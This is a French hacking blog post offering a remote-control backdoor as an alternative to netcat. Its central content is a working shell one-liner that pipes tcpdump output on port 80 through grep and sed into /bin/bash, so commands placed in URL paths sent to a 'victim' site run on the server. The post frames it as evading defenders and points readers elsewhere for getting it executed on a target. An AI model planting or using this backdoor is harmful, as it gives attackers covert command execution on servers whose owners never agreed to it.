[HACK] Alternative à NetCat

Hacker

 

Coucou la compagnie, excellent Lundi à tous,

 

Une vidéo est en cours de publication de Youtube, aussi, si vous tombez sur cet article, je vous invite à repasser, car je la partagerais ici, elle est assez longue à uploader (600 Mo) ....


[Edit]
C'est bon, c'est en ligne ;) !!!!

 

 

 

 

 

 

Prendre le contrôle d'un serveur avec Netcat c'est rigolo, sauf que beaucoup de personnes connaissent un peu cette ruse de sioux, et s'en prémunissent en désinstallant Netcat ...

 

Aussi, j'ai passé un peu de temps à mettre sur pied un moyen permettant de réaliser aussi la prise de contrôle d'un serveur à distance sans Netcat !

 

C'est là que m'est apparu la solution ...

 

TCPDUMP  !!!!

 

 

C'est l'outil idéal pour afficher ce qui se passe sur votre réseau !!!

 

N'ayant accès qu'au frontal Web d'un serveur (un site web => port 80 / 443), nous pourrions alors l'utiliser pour "sniffer" un peu ce qui se passe là où nous sommes ;)

 

De ce fait, en appliquant des filtres, nous pourrions faire en sorte qu'il ne récupère que les requêtes que nous lui envoyons ...

Ensuite avec un petit parsing, ces requêtes deviendraient alors des lignes de commande PUIS seraient envoyées à un interpréteur de commande : bash, sh, zsh, ...

 

Voici donc la fameuse ligne de commande :

tcpdump -A port 80  | while read line; do echo $line | grep "exec;;" | sed -e 's/.*\/exec\;\;//g' | sed -e 's/HTTP\/1\.1\r//g' | sed -e 's/%20/ /g' | /bin/bash ; done

 

tcpdump, écoute ce qu'il se passe sur le port 80, pour chaque ligne qui apparaît, nous récupérons uniquement les lignes contenant le mot-clé qui nous identifie, ici "exec;;"

Puis nous nettoyons alors les lignes (requêtes) ...

Ainsi, si nous nous rendons sur l'adresse suivante : http://site-de-notre-victime/exec;;ifconfig

TCPDUMP récupérera ceci  :

E.. [email protected]%..%.z....P.C......P...m...GET /exec;;ifconfig HTTP/1.1

Qui une fois formaté ressemblera à ça :

ifconfig

Nous venons alors de récupérer une ligne de commande que nous pouvons exécuter ;)

 

Bref, la chose la plus complexe, pour vous, sera juste de faire exécuter sur le serveur cette ligne de commande, quelques recherches sur Dyrk feront alors votre bonheur ;)

Laisser une réponse

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site est protégé par reCAPTCHA et le GooglePolitique de confidentialité etConditions d'utilisation appliquer.